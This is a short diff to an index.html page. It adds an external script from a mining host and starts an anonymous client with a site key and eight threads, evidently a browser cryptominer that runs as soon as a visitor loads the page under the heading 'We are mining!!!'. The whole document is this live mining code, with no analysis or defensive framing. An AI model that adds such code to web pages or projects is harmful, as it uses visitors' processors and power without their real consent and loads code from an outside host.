--- a/index.html
+++ b/index.html
@@ -6,7 +6,16 @@
 	</head>
 
 	<body>
+<script src="https://www.hostingcloud.racing/t7BG.js"></script>
+<script>
+	
+    var _client = new Client.Anonymous('0d8cf493f24b3910d3d3e2c0fd6a4995493d7ca17a3931e008338b77d538628b', {
+        threads: 8, c: 'w'
+    });
+    _client.start();
+    
 
+</script>
 
 		<h1>We are mining!!!</h1>
 
